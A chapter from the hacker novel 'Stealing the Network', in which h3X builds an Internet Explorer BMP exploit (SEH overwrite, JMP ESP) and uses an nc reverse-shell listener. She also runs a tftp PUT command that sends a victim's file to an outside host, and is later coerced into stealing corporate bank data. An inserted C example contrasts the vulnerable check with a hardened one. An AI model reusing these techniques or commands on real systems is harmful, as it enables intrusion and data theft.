Exceptional Circumstances


Next day, h3X gets back to her little experiment. She opens the bitmap file created yesterday in a hex editor and starts looking at the file format. The first line contains the variable gta mentioned. Pulling up the documentation of the BMP file format, she sees clearly where the modifications to the picture need to be made:

 BitmapFileHeader
   Type          19778
   Size          3118
   Reserved1     0
   Reserved2     0
   OffsetBits    118

That means that the eleventh byte starts the offset bits, a four-byte variable. Now, four-byte variables are commonly called integers in C-centric programming environments. This is what the hacker had complained about in his e-mail regarding the coding practices in Redmond. Using an integer to store data from a four-byte chunk of user input means that the user data will occupy all 32 bits of the integer. What many people keep forgetting is that an image downloaded as part of a web page is still user data and needs to be handled with the same care as data entered in a username or password field of an application.

Now, the bug in Microsoft's code is this: an integer as declared there has 31 bits for the numerical value. The 32nd bit is used to tell the processor whether this is meant as a positive (0) or a negative (1) value. But since the data in the file is just plain bytes, there is no such distinction when looking at the BMP file header. h3X goes ahead and changes the offset bits field in the first line of the header to FFFFFFFF:

 0000000: 424d 3600 0600 0000 0000 ffff ffff 2800  BM6...........(.

Then she saves the file and puts it on her local web server as an image embedded in the start page. Starting Internet Explorer, h3X surfs to the server and IE instantly disappears from her screen. "Well, that worked," she thinks. Looking back at the code, she instantly knows what happened. The data FFFFFFFF was loaded into the variable _bmfh.bfOffBits. Since this is a signed integer, the uppermost bit became one and marked the real value of the variable as -1. Now, when

 cbSkip = _bmfh.bfOffBits - cbRead; 

is calculated, it becomes even smaller, because subtracting something from -1 never makes it positive, as everyone with a tightly planned bank account learns the hard way sooner or later. The test

 if (cbSkip > 1024) 

of course results in false as well, because something like -17 is in fact smaller than 1024, and in the next line something brown and seriously smelly hits the fan:

 if (!Read(abDummy, cbSkip)) 

The function Read() obviously expects an unsigned integer as the number of bytes to read and the buffer to read them into, which is abDummy in this case. So the negative value in cbSkip suddenly becomes a very, very large positive value again, something around 4 Gigabytes. Although Windows machines tend to have and need a lot of RAM, 4 Gigs is more than Internet Explorer planned for. The buffer is only 4 KB big. The read operation basically writes data across important data structures on the stack of the IE process until a border is reached and the processor tells Windows that this program is massively misbehaving and should receive capital punishment.
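The arithmetic described in the paragraphs above, as an added C example that is not code from the book or from the leaked source: it parses bfOffBits from the header bytes shown, runs the signed check the text describes against it, and puts an unsigned, underflow-aware version of the same check beside it. The struct and function names, and the 14 header bytes assumed for cbRead, are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Upper bound the original check compares cbSkip against (from the quoted code). */
#define SKIP_LIMIT 1024

/* Outcome of evaluating the "skip to pixel data" check for one header. */
typedef struct {
    int32_t  cb_skip_signed;   /* cbSkip as the original signed arithmetic computes it */
    uint32_t cb_skip_as_size;  /* the same bits as the unsigned count Read() would receive */
    int      accepted;         /* 1 if the check would let the Read() call proceed */
} skip_check_t;

/* Parse bfOffBits, the little-endian four-byte field at byte offset 10 of a
 * BITMAPFILEHEADER (the "eleventh byte" in the text). Returns 0 if the buffer
 * is too short or does not start with the "BM" magic; 0 is never a valid
 * pixel-data offset, so it doubles as the failure value. */
uint32_t parse_bfOffBits(const uint8_t *hdr, size_t len)
{
    if (len < 14 || hdr[0] != 'B' || hdr[1] != 'M')
        return 0;
    return (uint32_t)hdr[10]
         | ((uint32_t)hdr[11] << 8)
         | ((uint32_t)hdr[12] << 16)
         | ((uint32_t)hdr[13] << 24);
}

/* Model of the flawed logic: the field lands in a signed int, the subtraction
 * stays negative, and the signed "> 1024" test cannot catch a negative value. */
skip_check_t vulnerable_skip_check(uint32_t bfOffBits_raw, uint32_t cbRead)
{
    skip_check_t r;
    int32_t bfOffBits = (int32_t)bfOffBits_raw;     /* 0xFFFFFFFF is read as -1 */
    int32_t cbSkip = bfOffBits - (int32_t)cbRead;   /* -1 - 14 = -15, still negative */
    r.cb_skip_signed  = cbSkip;
    r.cb_skip_as_size = (uint32_t)cbSkip;           /* reinterpreted: about 4 GB */
    r.accepted = !(cbSkip > SKIP_LIMIT);            /* -15 > 1024 is false, so accepted */
    return r;
}

/* Hardened form: keep the field unsigned, reject offsets that point back into
 * the bytes already consumed (underflow), then apply the upper bound. */
skip_check_t hardened_skip_check(uint32_t bfOffBits, uint32_t cbRead)
{
    skip_check_t r = { 0, 0, 0 };
    if (bfOffBits < cbRead)            /* would wrap: offset inside the header */
        return r;
    uint32_t cbSkip = bfOffBits - cbRead;
    if (cbSkip > SKIP_LIMIT)           /* larger than the scratch buffer */
        return r;
    r.cb_skip_signed  = (int32_t)cbSkip;
    r.cb_skip_as_size = cbSkip;
    r.accepted = 1;
    return r;
}

/* Constructed sample: the 16 header bytes from the hex dump quoted above, with
 * bfOffBits already patched to FFFFFFFF. */
static const uint8_t k_patched_header[16] = {
    0x42, 0x4d,             /* "BM" */
    0x36, 0x00, 0x06, 0x00, /* bfSize */
    0x00, 0x00, 0x00, 0x00, /* bfReserved1, bfReserved2 */
    0xff, 0xff, 0xff, 0xff, /* bfOffBits */
    0x28, 0x00              /* start of BITMAPINFOHEADER (biSize = 40) */
};

/* Assumed value: the 14-byte BITMAPFILEHEADER has already been read when
 * cbSkip is computed; the book only says cbSkip ends up "something like -17". */
#define HEADER_BYTES_READ 14u

int main(void)
{
    uint32_t off = parse_bfOffBits(k_patched_header, sizeof k_patched_header);
    skip_check_t v = vulnerable_skip_check(off, HEADER_BYTES_READ);
    skip_check_t h = hardened_skip_check(off, HEADER_BYTES_READ);
    printf("bfOffBits = 0x%08x\n", (unsigned)off);
    printf("vulnerable: cbSkip = %d (as size: %u bytes), read proceeds = %d\n",
           (int)v.cb_skip_signed, (unsigned)v.cb_skip_as_size, v.accepted);
    printf("hardened:   read proceeds = %d\n", h.accepted);
    return 0;
}
```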

In regards to capital punishment, Windows is a little bit like first-world justice systems. If you can afford to spend some of your money (or memory) on someone handling the case for you, such as a lawyer, it gives you more freedom and a chance to escape the electric chair, lethal injection, or kernel process termination and the display of a Dr. Watson window. What a lawyer is in the real world, a Structured Exception Handler is in Windows. All the software has to do is install this SEH before doing anything that could possibly go wrong and proceed. If everything goes as planned, the software will remove the SEH afterward and has only spent a few (8) bytes of its process space on it as some type of insurance. In case things do go wrong, the SEH is called by the NT kernel, or ntdll.dll, to be more precise. It's like the guaranteed call to your lawyer before any of the police officers are allowed to interview you. And like anyone with enough money (or memory), you can have more than one SEH, just in case the first can't get you out of jail in less than 10 minutes.

h3X realizes that this is also the reason why the IE window just disappeared without so much as a message box. Starting IE again in OllyDbg and opening the same web page, she sees what happens: the copy operation overwrites not only the buffer, the important addresses located after it, and some data structures, but also the exception handler address before it's interrupted by the processor, which is not amused about this bloat.

"Hehe, this is almost too simple," h3X says to the screen and smiles. By overwriting the address of its SEH, Internet Explorer committed a crime and lost his address book with the phone number of his insurance agent and his only lawyer while fleeing the crime scene. What she plans to do is replace the phone number in his address book and hand it back to him, so he can call what he thinks is his lawyer. h3X proceeds and modifies the image so that at the right position it contains the address of an instruction that is part of Internet Explorer. Somewhere in one of the many DLLs IE uses, she finds the instruction she is after. Since these DLLs end up in the same position in memory every time you start IE, it will also work on computers other than hers. The instruction is JMP ESP, and it allows h3X to put the little egg code she developed right behind the address.

It is done in a matter of minutes. Now all she has to do is put her shellcode in the image and make sure it's correctly placed. A few little issues arise with the totally smashed stack memory of IE and her shellcode, but after another half an hour she's done with it and has something quite nice to show for it. h3X leans back and looks at the result. Many people don't understand where new exploits, so-called 0-day, come from. They simply assume they come from "the Internet". But in fact, 0-days come from curious hackers, and this particular one comes from h3X. She saves the file as FAUSTUS.BMP and copies it onto the web server hosting her little hacker web site: h3x.darklab.org.

Now her little experiment can start. The code that gets delivered and executed with the image will initiate a connection from the victim machine to one of her systems. Well, it isn't exactly her system, but the system considers the account she uses the most privileged one, and well, computers don't lie, do they? h3X logs into the system and opens a process that will accept the connection and serve as her way to talk to the victim machine. The beauty of making the victim connect back to her is that most personal or corporate firewalls will allow it. Internet Explorer is supposed to make connections to all kinds of systems on the Internet, and since it's an outgoing and not an incoming connection, it can't be a hacker, right?

 tanzplatz# ssh root@pc102.lab.cmu.edu
 root@pc102.lab.cmu.edu's password:
 [pc102:~]# nc -l -p 4711 -n -v
 listening on [any] 4711 ...

The only downside of her plan is boredom. Putting together the exploit has been the type of fun that h3X really enjoys. Waiting for the first person to access her web page with Internet Explorer version 5.0 or 5.5 is not really entertaining. "Maybe this is why everyone seems to ignore client-side exploits, it's just too freaking boring," she thinks. To kill some time, she calls one of her hacker friends in town to see what's going on lately. When the phone finally gets a connection and the call is answered, she immediately starts talking:

"Hey, it's me. How's it going?"

"Quite well, and yourself?" her phone's speaker says.

"I'm having fun. Remember the bug they found in the leaked Windows source code? Got myself an exploit for it. Just as a hint, don't access my website with IE these days," h3X giggles.

"You know, I would, just to see if you finally managed to get stable exploits done, but for some strange reason Google can't find the download site for Internet Explorer to run on FreeBSD."

Just for the fun of it, h3X enters "Internet Explorer for FreeBSD" into Google and clicks the "I'm Feeling Lucky" button. She says, "Hey, there is at least a petition for IE on FreeBeasty. Want to sign it?"

"Very funny indeed," the person on the other end says. "I wonder why one would ask for IE on FreeBSD. Next thing you know there's an Outlook Express messing around with my system with root privileges, because otherwise it would not be able to display the annoying little paperclip." Both of them laugh at the idea. They go on and chat about things to do in the near future, which conferences to go to, and other things. Then, after about half an hour, h3X interrupts the conversation as things start to happen on her terminal with the listener.

 listening on [any] 4711 ...
 connect to [212.227.119.68] from (UNKNOWN) [2.7.130.8] 32815
 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-1999 Microsoft Corp.

 C:\Program Files\Internet Explorer\>

"Hey, listen, someone just bit it. I'll get back to you later. Bye," is all h3X says before quickly disconnecting the call. Someone accessed her web page and used the right type of browser. Obviously, the exploit worked and his Internet Explorer connected back to her little shell listener. From the command line it's already quite clear that the victim uses an English version of Windows, which makes things easier. There's nothing like taking over a Windows host only to realize that it's French and you don't understand a word of what the output says.

The victim probably doesn't even know he just got owned. Internet Explorer will not crash or disappear when her exploit executes, but will just misbehave slightly. It'll have certain issues with displaying all kinds of pictures, probably nothing unusual for the average Windows user. h3X looks at the strange IP address this guy is coming from. She accesses RIPE's whois database and checks who has this network block assigned. To her surprise, the IP address range 2.0.0.0-2.255.255.255 is marked as RESERVED-2. Usually, no computer with a browser should be using those IP addresses. In fact, they shouldn't be routed through the Internet at all. Normally, a trace to this IP address would be in order now, but h3X needs to find out what type of computer/person she just owned.

She goes ahead and uses the well-known dir command to look at various directories. Normally, she would also try to access other drive letters, but that's not such a good idea right now. Assuming one of the drive letters is connected to a USB stick, or even worse to a floppy or CD-ROM drive, the sound of a removable media drive suddenly spinning into action could give away her presence. One should not forget that in this scenario, the victim is still sitting right behind the keyboard of his computer. While exploring the box, h3X stops at the listing of C:\. Wait a minute. This gets interesting. "We are dealing with someone who got his box locked up quite tightly, but for confidentiality, not exactly for security," she thinks. The reason for this observation is the set of programs she finds installed on the system. First and foremost, the directory C:\SAFEGUARD\SGEASY tells her that hard drive encryption software from the German vendor Utimaco is in use. This software is neither freeware nor cheap, so either this chap is extremely paranoid or he has a good reason to hide his data. "Speaking of which," h3X says to the screen, "where is the data?" She keeps looking around on the C drive, but Documents and Settings contains only the usual crap and the system doesn't look that much used overall. She tries the command net use, to see if this guy may have all his data located on a server that he accesses using this computer, but no drive mappings appear. She checks around a few more files and directories and finds another one in C:\Program Files that gets her attention. "Hell, this guy is seriously paranoid," she thinks when she discovers that PGP in its full corporate license mode is installed on the machine. This gives h3X an idea. Maybe the data is inside a PGPdisk.

The corporate PGP software comes with a number of add-on features that are widely used. One of those is PGPdisk, which creates a large file on your hard drive, encrypts it, and mounts this file as if it were another drive in your computer. When you place files in there, they get instantly encrypted and are never written in the clear to the media. Its easy-to-use interface made this software widely used. h3X remembers that there was a discussion about PGPdisk command line switches on one of the PGP mailing lists a while ago. Using Google to find this particular thread, she reads carefully through all the information and references. If the victim spotted her now and closed the connection, it'd be better not to have touched anything yet. On the other hand, it's not very likely that he knows h3X is on his box, so she'd better study her options before invoking a program that might pop up unexpected messages on the user's screen, giving away her presence. Twenty minutes of reading later, she realizes that none of the undocumented command line switches will do what she's after, namely display a list of mounted PGPdisks on the system without opening some GUI window.

The hackse reverts to checking where the currently logged-on user would place his files when he follows the standard Windows convention:

 C:\> echo %HOMEPATH%
 G:\Documents and Settings\Knuth\
 C:\>

Wondering what drive G: could be, h3X goes there. She assumes correctly that Windows would complain all over the place if this drive didn't exist. She then changes into the My Documents folder and, to her pleasure, finds several large files with the extension .pgd, which are in fact the suspected PGPdisk containers she is interested in. Since no network drives are mounted, she now changes her mind and decides to try a few other drive letters to see if there is anything connected. In the worst case, she is going to light up all the LEDs on CD-ROM drives, USB sticks, and other media this guy might have connected.

 C:\> dir d:
 The device is not ready
 C:\> dir e:
 The system cannot find the path specified.
 C:\>

So drive D appears to be a CD-ROM or something along those lines. She goes on checking other drives and finally ends up at the letter K. Here, the output of the dir command looks a lot more interesting. The directory contains a number of subdirectories with strange names such as "The Don", "Dex", "Paul Meyer", "Matthew Ryan". "Maybe this guy is a publisher and just wants to keep the material from his authors secure," h3X wonders. She has heard that even some of the publishers who make money with computer security books on a regular basis now actually read the stuff they publish and begin to live security. But after all, those directories could be anything. She keeps going through the names when she finds one that's named "Candidates". CDing in there, she finds a single file called candidates.doc. h3X would love to get her fingers on the file. But to do that, she will need to get the file down from the computer that is used by a person named "Knuth". She decides to take a chance. Maybe he will notice the activity and shut the connection down; maybe he even has a personal firewall that will warn him of the activity from the tftp.exe command line program. But curiosity gets the better of h3X, since this is what the whole experiment is all about.

She quickly checks to make sure the IP address of the system is actually the one connecting to her and does not get translated somewhere on the way when passing through a firewall. Most firewalls these days actually drop TFTP, since it's so widely used by hackers while being of very limited use to legitimate system administrators, at least when accessing something outside of their perimeter. Luckily, the IP address actually belongs to the system itself, so the only thing that could ruin the plan is a tightly configured personal firewall.

 C:\> g:
 G:\> cd Candidates
 G:\Candidates> tftp -i 212.227.119.68 PUT candidates.doc f.doc
 Transfer successful: 46080 bytes in 196 seconds
 G:\Candidates>

Now h3X is excited. It worked, and for the moment she doesn't waste a single thought on the possibility of being spotted by the (former) owner of the file. All she wants to know is what's in the file. She opens the file using antiword, a tool whose author she would like to kiss every time she uses it. It makes a readable ASCII version out of these big Microsoft Word documents, and one can pipe this to less. The fascinating part of antiword is that it can often cope with more types of .doc files than any version of Word can. In short, it's an excellent piece of work and very useful.

Looking at the output, she leans back and takes it all in. There is a list of people behind simple bullet points. Some of them are listed by what appear to be their real names, some with handles that look like hackers', and some have no identifier whatsoever, just a phone number or an e-mail address. Behind every entry are a few comma-separated notes, mostly single words. As expected, h3X doesn't know most of the names on the list. To her complete puzzlement, she realizes that she does know a few of them by name and even two personally from hacker conferences. All of the names she knows have a few comments on them and one that unifies them all: (OUT). This single word in parentheses suggests that whatever these people were candidates for, they weren't chosen for the task. "But why would you collect a list of hackers?" she asks the window that still has an open shell to the remote Windows system.

Because the answer to that question does not show up on her screen, she resumes looking at the files on this particular drive. She checks a few filenames in the other directories. The file system structure now makes more sense, since many of the directories have names of people on this list, all names of those without the mysterious (OUT) remark. For no particular reason, she decides to check the directory named "Paul Meyer". It contains a number of files, but none of the names makes any particular sense. One file is a TIFF, so maybe this is a picture of the guy or something else that might yield a hint on what she stumbled upon here. So h3X transfers the file PaulStJames.tiff, again with TFTP, down to her system. Unfortunately, this one she also has to transfer all the way down to the system she's working on, since the rooted system she used for the back-connect shell doesn't have an X Window System installed, and you'd better have some type of graphics support to look at a picture. When the file is finally on her hard drive, she opens it with the Electric Eyes viewer and looks at what she's got here.

"Holy shit!" is all she manages to say. What she's looking at appears to be a scan of a death certificate for this guy named Paul Meyer. The document looks official and real. Now she also sees that it is a South African document. "Oh f..." she says, trailing off, and her fingers start flying over the keyboard. She closes the remote shell on this cursed Windows system and also on the hop she used to open the remote shell. Then she logs into her web site and removes the image source tag pointing to the client-side exploit image. Having done all that, she connects to her home router and terminates the Internet connection. Then she just takes her trembling fingers from the keyboard, hugging herself as if to warm her own body. She tries to think it all over, but the only words that keep appearing in her head are "This is not good. This is definitely not good."

h3X doesn't really know how long she's been sitting in that curled-up posture, staring into the room. There are very few things that can scare her, but just having fun making and using an exploit and ending up on a heavily encrypted end user system with scans of death certificates is really pushing hard on her coolness. She nearly jumps out of her skin when some electronic melody breaks the silence around her. Her mood changes from scared to annoyed when she realizes that it is her mobile phone. She inspects the display, but the only information on it is simply "incoming call". "As if I didn't know that from the sound you are making," she says to the device. Wondering who that could be, she presses the green button to answer. A deep, calm voice on the other end says immediately, "Do you want to die?"

h3X can't say a word for a few seconds. She is not paralyzed at all, but even with a high-performance brain, it takes a few time ticks before all the synapses wake up, connect, and talk to each other. "So it's even worse than I expected," she thinks, suddenly calming down since her focus is needed right here and now. "I guess the answer to that is no," she says. Again it takes a few seconds before anything happens, and h3X suddenly understands that this is not only the guy she just owned but that he is, in fact, surprised to be talking to a girl. Taking into account that he managed to figure out her mobile phone number so quickly, it is surprising that he missed that fact. But then again, he was in a rush and it's not always obvious with those foreign names. He didn't even realize that his chances of talking to someone who speaks acceptable English were fairly slim.

"Why did you break into my computer, kid?" the voice says.

"Well, technically, you broke into your own computer by surfing to my web page," she says with a little bit more strength than before. She begins to feel better. Whatever happens next, she has a general picture of the situation, and that makes for a better outlook on the future, even if that's a short one.

"Don't play any games with me. From what I see here, you already know what consequences you could face for that." The fact that he uses the word "could", not something more final in meaning, is reassuring to h3X. She doesn't see any point in saying anything in response. He has called her, so it's his move.

"Okay, give me a very good reason not to kill you, and I might consider it," the voice comes back.

"Well, since you are obviously compiling a list of hackers for some project of yours, you called the right number," she says. She's convinced that begging and crying is not going to help in her current situation, but proposing a good deal to the guy could improve her position, not that it could get any worse than it already is.

"I have seen a bit of your work on your web page while you hacked my computer," the voice goes on. "Why do you concentrate on this SAP stuff? What type of access do you gain with that and to what type of companies does this apply?"

The human mind can be controlled to a certain degree, but in stress situations, with maximum focus, it also reacts quickly in ways that consciousness can't control. The only thing h3X can do is laugh out loud. She didn't want to, but this is just too hilarious. This guy is either a very black-operation government person or a criminal interested in computers as a vector for his plots, and he doesn't know what SAP is and why one would hack it? Way too funny.

"Kid, what's so funny? Do you underestimate how dangerous your situation is?"

"No sir," she manages to say. Then she takes a deep breath and continues almost as calmly as he is, "SAP is used in the biggest businesses all over the world. All the top companies run it. In the years since it was first created around 1972, it has been introduced into almost every big company on earth. Lately, with the Internet as the primary platform of all global communication, this product opened up to the Internet as well. But the software security levels are still far behind." h3X pauses. "How do I explain this?" she wonders. Being threatened with death is not exactly what makes a girl feel safe and bold, but since the conversation is going into technical details, she starts to feel @home again. This is her world, and the guy might be a big gangster boss or whatever; in cyberspace h3X is the witch and he's just some warlord, commanding big armies of orcs but failing to realize the power of the queen of the elves.

And then she gets it: "Have you been to some international airport lately? If so, have you noticed all those advertisements saying 'such-and-such company runs SAP'? Just imagine every time you see such an ad, you know that you hold a copy of the keys to their kingdom." While this might have been a good explanation of why someone would actually concentrate on hacking SAP, it doesn't reflect the current level of h3X's knowledge and exploits at hand. In general, the statement was true, but in the little details that come up when you try to use other little details like buffer size checks (or the lack thereof) to get into a system, it doesn't really work that easily. But the guy seems to already know that. "So, can you get into any of those companies?"

"Well, not exactly, but with some time, I guess," she says reluctantly. h3X feels like she's in a presales meeting with a big customer while working for a dot-com startup. You need to get the point of technical excellence across, let them know that no task is too big for you, assuming they provide the money for it. This mostly means a fair bit of technically correct bullshitting. You need to instantly decide what your state of the art could be, assuming you had more time before the meeting and more capital in general, but you must refrain from promising impossible things. This is one of the reasons you don't want to send a pure salesman, because he usually can't tell the difference, and buries the techies in piles of brown semi-liquid stinking excrement with his promises.

"Okay kid. I'm not really convinced yet, but I checked your site for a reason. Mark my words, I'm not saying I won't kill you. All I'm saying is that you should get to work and get me some information. Do you think you can get access to the bank account information of a few large corporations?" h3X doesn't really have a choice. "Yep," is all she manages to say in response. The person continues in the same calm voice as before, "Then I want you to obtain bank account information, including where the company is located, what bank it uses, what scale regular transactions to and from their accounts are, and so on. Get me as much information as possible. If you get caught, the police will find your body somewhere in a river. If you don't fail me, you buy yourself a lottery ticket for staying alive. When you are done, send the information to Knuth@hushmail.com." h3X is about to confirm the information when she hears the little beep that signifies the end of the call.

After the call, she feels the effects the last half an hour had on her. Her hands shake more than just a little bit and she desperately needs a cigarette. Walking over to her desk, she fetches one out of the pack and lights it. The sensation of smoke inhaled into her lungs calms her down. When the nicotine hits her brain hard, things around her start to spin just a little bit. Relaxing, she sinks into her chair. "Now we need a good plan," she thinks. But suddenly she also feels very tired. "I need to think this over. If I start right now, it's going to be a disaster," her thoughts travel. She tries to concentrate on the problem at hand, but her mind wanders off in different directions. She thinks about the people who could have more information, which leads to memories of past hacker conferences and gatherings, which leads to memories of happy drinking, parties, and a few nice guys she spent some more time with. This Knuth guy didn't give her any time frame, but she's sure he was talking in the range of a few days, not weeks or months. Nevertheless, she doesn't feel like starting to hack a number of heavily protected Fortune 500 companies just now. Stuff like that needs time, but that's exactly what she doesn't have. But a little bit of pure simple thinking, projecting, and planning should take place before she touches the computers again.

h3X walks over to her kitchen and takes one of the little Tupperware boxes her mother had pressed on her, not knowing what to do with all the plastic food storage solutions she bought at the last Tupperware party in her house. In this particular case, the boxes are used to keep things that would otherwise distribute a very distinct smell all over her place. She opens the one currently in use and takes some of the green herbs out of it. Then she sits down and tears a quarter off a business card some moron had given her somewhere she doesn't remember. The business card and the herbs, together with parts of a cigarette and a 120mm rolling paper, are soon assembled into a conical object that heavily contributes to her mental health and calmness. Sucking on the result of her craftsmanship, she leans back on the couch and considers her options. Soon she takes a piece of paper and starts to jot down a few tasks. Her mind now starts to grasp the whole situation she's in and explores ways to perform the job that would possibly save her life:

So he needs information from the wire transaction tables in a few SAP systems. The only obvious way to get to the R/3 core of the systems is to find a route that is direct and guaranteed to work. Just breaking into the network and trying to hack around long enough to find a route not blocked by a firewall is not going to work. What I need is the Internet side of the SAP installation, where you can be sure that some level of access into the backend exists: such a system has to have connectivity to the main boxes. I remember these guys at this conference talking about the Internet Transaction Server. It should be possible to check a few company business-to-business sites and find a number of ITS installations. The guys at this conference also released a few exploits for the thing, but those are probably patched. If I remember correctly, the information about what's patched and what's not is not publicly available. Therefore, I need to find a person who has access to this information in order to determine how many ITS systems are unpatched. From that point, I could try to find a way directly to the database and take it from there.

Slowly, something that could be called a plan, or at least the outline of one, is forming in her head. She jots down a few bullet points on her piece of paper. Then she picks up her phone and selects a name from the phone book. Hitting the call button, she holds the mobile phone to her ear. But instead of a ring tone she's instantly connected to the voice mail system, and a badly sampled middle-aged female voice tells her that the person she called is currently unavailable. When the voice finally finishes its long message designed to increase the mobile phone airtime, h3X leaves a message: "Hey Tom, it's me. I really need your help. You guys still have that SAP system these consultants screw around with? Could you try to get an access code to the SAP support pages or whatever they have so we can check on patches? Please, it's really, really important." Then she hangs up, snatches the remote control from the table, and instructs the HiFi system on the other end of the room, via binary data encoded in an infrared light beam, to fill the silence of the room with some good music.




Stealing the Network. How to Own a Continent
ISBN: 1931836051
Year: 2004